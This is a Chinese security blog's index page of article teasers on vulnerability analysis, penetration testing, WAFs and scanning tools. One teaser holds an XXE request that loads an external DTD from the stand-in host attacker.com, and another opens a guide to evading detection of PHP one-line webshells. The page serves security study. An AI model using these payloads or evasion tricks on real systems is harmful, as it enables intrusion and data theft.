Linux内核CVE-2017-11176漏洞分析与复现 代码审计

Linux内核CVE-2017-11176漏洞分析与复现

一、漏洞背景 Linux内核中的POSIX 消息队列实现中存在一个UAF漏洞CVE-2017-11176。攻击者可以利用该漏洞导致拒绝服务或执行任意代码。本文将从漏洞成因、补丁分析以及漏洞复现等多个角度对该漏洞进行详细分析。 二、漏洞分析 Posix消息队列允许异步事件通知,当往一个空队列放置一个消息时,Posix消息队列允许产生一个信号或启动一个线程。这种异步事件通知调用mq_notify函数实现,mq_notify为指定队列建立或删除异步通知。由于mq_notify函数在进入retry流程时没有将sock指针设置为NULL,可能导致UAF漏洞。 ...
最新
阅读全文
警惕!WinRAR漏洞利用升级:社工、加密、无文件后门 渗透测试

警惕!WinRAR漏洞利用升级:社工、加密、无文件后门

背景 2019年2月22日,360威胁情报中心截获了首个利用WinRAR漏洞(CVE-2018-20250)传播木马程序的恶意ACE文件。并提醒用户务必对此高危漏洞做好十足的防护措施。 正如我们的预测,在接下来的几天内,360威胁情报中心截获了多个使用WinRAR漏洞传播恶意程序的样本,并且我们还观察到了多个利用此漏洞进行的APT攻击活动。可以明显的看到,攻击者针对该漏洞利用做了更精心的准备,比如利用WinRAR压缩包内图片列表不可预览来诱导目标极大概率解压恶意文件、将恶意ACE文件加密后投递、释放“无文件”后门等。 事实证明,利用该漏洞传播恶意程序的攻击行为正处在爆发的...
阅读全文
drupal8系列框架和漏洞动态调试深入分析 代码审计

drupal8系列框架和漏洞动态调试深入分析

前言 在drupal框架中,比较经典又离我们最近的莫过于18年的CVE-2018-7600这个漏洞了。但是通过本人阅读和学习过此漏洞分析文章的过程中,发现都是针对于此漏洞点的详细分析。相对于此框架运行流程不是很熟悉的人可能在阅读完后很难理解。 作为阿尔法实验室的一员,本人通过阅读框架相关文档与漏洞分析的相关文章和自己对框架源码的调试,对框架运行的流程有了进一步的了解。 在此把这些分享给大家,本文主要分为两大部分: 第一部分是对drupal框架流程的简介(这里主要针对8.x系列),让我们知道在symfony开源框架基础上的drupal框架是如何利用监听者...
阅读全文
使用本地DTD文件来利用XXE漏洞实现任意结果输出 渗透测试

使用本地DTD文件来利用XXE漏洞实现任意结果输出

本文我要向大家分享一个小技巧,即使用本地DTD文件来利用XXE漏洞从而实现任意结果的输出。 想象一下你有一个支持外部实体的XXE,但服务器的响应始终为空。在这种情况下,你有两种选择:基于错误和带外利用。 以下是基于错误的示例: Request <?xml version="1.0" ?> <!DOCTYPE message [ <!ENTITY % ext SYSTEM "http://attacker.com/ext.dtd"> %ext; ]> <message></mes...
阅读全文
类型混淆漏洞实例浅析 代码审计

类型混淆漏洞实例浅析

类型混淆漏洞一般是将数据类型A当做数据类型B来解析引用,这就可能导致非法访问数据从而执行任意代码。 本文通过IE类型混淆漏洞实例和Word类型混淆漏洞实例进行分析,来学习理解类型混淆漏洞原理。  实例一:IE/Edge类型混淆漏洞(CVE-2017-0037) 漏洞原因:函数处理时,没有对对象类型进行严格检查,导致类型混淆。 分析环境:Win7、IE11 分析工具:Windbg、od、IDA Pro 在PoC中定义了一个table,标签中定义了表id为th1,在boom()中引用,然后是setInterval设定事...
阅读全文
一句话木马的套路 渗透测试

一句话木马的套路

0×01 前言 尽最大努力在一文中让大家掌握一些有用的 WEBSHELL 免杀技巧。 0×02 关于 eval 于 assert 关于 eval 函数在 php 给出的官方说明是 eval 是一个语言构造器而不是一个函数,不能被 可变函数 调用 可变函数:通过一个变量,获取其对应的变量值,然后通过给该值增加一个括号 (),让系统认为该值是一个函数,从而当做函数来执行 通俗的说比如你 <?php $a=eval;$a() ?> 这样是不行的 也造就了用 eval 的话达不到 assert 的灵...
阅读全文
Web中间件常见漏洞总结 渗透测试

Web中间件常见漏洞总结

一、 常见web中间件及其漏洞概述 (一) IIS 1、PUT漏洞 2、短文件名猜解 3、远程代码执行 4、解析漏洞 (二) Apache 1、解析漏洞 2、目录遍历 (三) Nginx 1、文件解析 2、目录遍历 3、CRLF注入 4、目录穿越 (四)Tomcat 1、远程代码执行 2、war后门文件部署 (五)jBoss 1、反序列化漏洞 2、war后门文件部署 (六...
阅读全文
系统安全之SSH入侵的检测与响应 渗透测试

系统安全之SSH入侵的检测与响应

一、前言 作为系列文章的第一篇https://www.freebuf.com/es/193557.html 介绍了攻防系统的整个环境和搭建方法,按照这篇文章应该是可以把整个环境搭建完毕的.。在这篇文章中还介绍到了课程大纲包含主机安全、web安全、后门/木马等等,下面就让我们开始我们的实验课程。 二、课程目标 首先第一个课程是主机安全的ssh端口入侵&检测&响应课程。 课程有几个目标如下所示: 1. 熟练使用nmap类端口扫描工具 2. 熟练使用hydra、msf等平台对ssh服务开展爆破行为 3. ...
阅读全文
为Nginx加入一个使用深度学习的软WAF 编程相关

为Nginx加入一个使用深度学习的软WAF

一、前言 本文介绍如何向Nginx增加了一个使用Tensorflow C库的软WAF模块,模块主体基于Naxsi。 二、获取数据及训练数据 这里,之前有Dalao发表过这样一篇文章:基于卷积神经网络的SQL注入检测。 这是一个开源的项目,但是由于速度的关系,我不打算使用这篇文章的模型,仅仅采用这篇文章使用的数据集。这样可以节省很多特征工程的时间。 数据训练并不是这篇文章的重点,这里仅仅说一下训练结果,这里为了防止CUDA周期对检测时间的影响,使用CPU跑推理过程。 如果您对数据的训练感兴趣,可以看我之前写的一篇文章:使用CNN做SQL和...
阅读全文
浅谈CSV注入漏洞 渗透测试

浅谈CSV注入漏洞

背景 某天在逛expdb时候看到了CSV Injection的exp,在渗透测试的过程中也偶尔会遇到类似的情况,这一漏洞很早之前就出现过,但是很多人没有意识到漏洞的危害性,于是抱着学习的心态进行了一波漏洞复现和学习。 漏洞介绍 CSV公式注入(CSV Injection)是一种会造成巨大影响的攻击向量。攻击包含向恶意的EXCEL公式中注入可以输出或以CSV文件读取的参数。当在Excel中打开CSV文件时,文件会从CSV描述转变为原始的Excel格式,包括Excel提供的所有动态功能。在这个过程中,CSV中的所有Excel公式都会执行。当该函数有合法意图时,很...
阅读全文
Rex:栈溢出之Exploit自动生成 渗透测试

Rex:栈溢出之Exploit自动生成

Rex 是由 Shellphish 开发的自动化漏洞利用引擎,设计初衷在于参加 Cyber Grand Challenge。本文以栈溢出为例,展示 Rex 自动生成 Exploit 的能力。测试样例为 Linux 下可执行程序 vuln_stacksmash,其中存在栈溢出漏洞,通过 Rex 自动生成 rop2system、rop2text、jmpesp 三种 Exploit。 0×00 vuln_stacksmash 栈溢出漏洞   使用 radare2 简要分析 vuln_stacksmash。vuln() 函数中,调用...
阅读全文
挖洞经验丨看我如何挖到多个D-LINK高危漏洞 渗透测试

挖洞经验丨看我如何挖到多个D-LINK高危漏洞

近期,360企业安全集团代码卫士团队安全研究人员发现友讯(D-LINK)公司旗下产品系列DIR-619、DIR-605系列路由器的两个高危安全漏洞(CVE-2018-20056和CVE-2018-20057),并第一时间向友讯(D-LINK)公司汇报,协助其修复漏洞。 DIR-605及DIR-619系列是友讯公司旗下的家用路由器产品。北京时间2019年1月4日,友讯(DLINK)公司发布了安全更新公告(https://securityadvisories.dlink.com/announcement/publication.aspx?name=SAP10100),公开致谢360企业安全集团代码卫...
阅读全文
Java Web安全之代码审计 渗透测试

Java Web安全之代码审计

信息安全的75%发生在Web应用而非网络层。本文内容主要以Java Web安全-代码审计为中心展开。 一、JavaWeb 安全基础 1. 何为代码审计? 通俗的说Java代码审计就是通过审计Java代码来发现Java应用程序自身中存在的安全问题,由于Java本身是编译型语言,所以即便只有class文件的情况下我们依然可以对Java代码进行审计。对于未编译的Java源代码文件我们可以直接阅读其源码,而对于已编译的class或者jar文件我们就需要进行反编译了。 Java代码审计其本身并无多大难度,只要熟练掌握审计流程和常见的漏洞审计技巧就可比较轻松的完成代码审计...
阅读全文
对 XSS 的一次深入分析认识 渗透测试

对 XSS 的一次深入分析认识

随着时间的推移,Web应用漏洞的类型在不断演变,但年复一年持续存在且影响广泛的漏洞仍然还属XSS漏洞。长期以来,XSS漏洞算是非常常见的安全问题,以至于对大多数人来说,即使一个新的XSS漏洞被披露,但从内心来说,早已习已为常。本文深入描述XSS攻击在几种实际环境中的应用,同时顺带提到了一些XSS攻击的绕过技术。 几种加载XSS Payload的不常见标签 和我们能想到的一样,预防是最好的治疗方法,而且去尝试和缓解一些意外的攻击也不失为一种好的策略实践。通常情况下,大多数组织机构只会部署现成的WAF产品(网络应用防火墙),而不是制订开发适合自身的缓解技术,根本不会意识到那些结合自身的防...
阅读全文
挖洞经验 | 如何利用postMessage窃取编辑用户的Cookie信息 渗透测试

挖洞经验 | 如何利用postMessage窃取编辑用户的Cookie信息

某天,当我在做某个项目的漏洞测试时,在登录的一些HTTP请求记录中,我发现了一种利用postMessage方式窃取和编辑用户Cookie的方法。由于该测试是邀请测试,出于保密,我只能在下文中和大家分享一些方法思路。 postMessage介绍 相信大家都听过不同窗口之间的通信、当前窗口与内部iframe框架的通信以及一些跨域技巧,window.postMessage功能就是允许在两个客户端的窗口/frames间发送数据信息,跨域地实现通信的方法。 在HTML5中,Window.postMessage() 方法可以安全地实现跨源通信。通常,对于两个不同页面的脚本,只有当执行...
阅读全文
活活将黑产搞崩溃的教务系统,你的母校可能在列 界内新闻

活活将黑产搞崩溃的教务系统,你的母校可能在列

院校政府网站一直是黑产眼中的金矿,但作为高校教务系统重要一环,选课系统却鲜有黑产惦记。这背后到底有哪些鲜为人知的故事呢? 我们有幸邀请到曾在某985教务处任职的A君,以及大学生代表B妹,围绕最近微博热议的高校选课系统,聊聊事件背后一些有趣的故事。微博某大V在上周发布了一篇有关高校选课的内容,一经发出引发各大各校应届与往届学生群体热议。大家声泪俱下,纷纷吐槽母校奇葩的选课网站以及APP。为此,Magiccc还专门针对各大高校选课网站以及APP做了简单的评测,并整理了个榜单。这里就不细表,大家感兴趣的可以回复“榜单”获取,看看自己的母校是否在列。 一、当前各大高校的选课系统是否存在选课难...
阅读全文
FourAndSix2.01靶机渗透 渗透测试

FourAndSix2.01靶机渗透

最近在乡下,网太慢了,只能玩玩靶机。 任务:获取root权限并且读取/root/flag.txt 安装 直接导入virtualbox即可。 开始 开机就可以看见靶机的IP:192.168.0.104 # nmap -n -v -Pn -p- -A  192.168.0.104 ... PORT     STATE SERVICE REASON         VERSION 22/tcp   ...
阅读全文
Sitadel:一款功能强大的Web应用扫描器 神兵利器

Sitadel:一款功能强大的Web应用扫描器

Sitadel实际上是WAScan的升级版,不过是Python版本(>= 3.4)的,这样有助于研究人员根据自己的需要去进行自定义开发,并引入新的功能模块。 目前,Sitadel可实现扩展的功能如下: 前端框架检测; 内容分发网络检测; 定义扫描风险等级; 插件系统; 可使用Docker镜像进行构建和运行; 工具安装 $ git clone https://github.com/shenril/Sitadel.git $ cd Sitadel $ ...
阅读全文
浅析端口扫描的几种方式 渗透测试

浅析端口扫描的几种方式

事件原由 笔者在写一个小工具,针对渗透测试中需要搜集的信息,使用脚本自动化采集。而在这个模块中有个很难搞的部分就是端口banner 信息搜集,起初我尝试使用了python+nmap+多线程扫描,扫描20+的ip,等的花都谢了。。。而笔者目标是扫描200+的ip。下面我就针对端口扫描的技术进行分析。 1.nmap探测端口 nmap在扫描多个主机的时候可以设置参数 --min-hostgroup ,设置这个参数可以并行扫描多个主机,将这些主机划分成组,然后一次扫描一个组。 栗子 --min-hostgroup 50 nmap 以50个主机为一组,在扫描...
阅读全文
命令注入新玩法:巧借环境攻击目标 渗透测试

命令注入新玩法:巧借环境攻击目标

在一次漏洞赏金活动中,挖掘到一个不标准的命令注入漏洞,我无法用命令分隔符、命令替换符注入新命令让系统执行,所以,从”型态”上讲,它不算是命令注入漏洞;但我又可以借助目标环境让载荷到达系统命令行,实现读写文件、执行新命令,所以,”神态”来看,它又像是命令注入。这类借助环境间接注入命令的利用手法,很少在常规讨论命令注入的文章中看到,有必要落笔成文,与你分享。 0×00 酷趣 wargame 由于受赏金厂商保密协议所限,我无法公开原始漏洞详情,但我更清楚 “talk is cheap, show me the code”,耗时费神,找到一个 wargame,相较赏金漏洞,不但体现了相同精髓...
阅读全文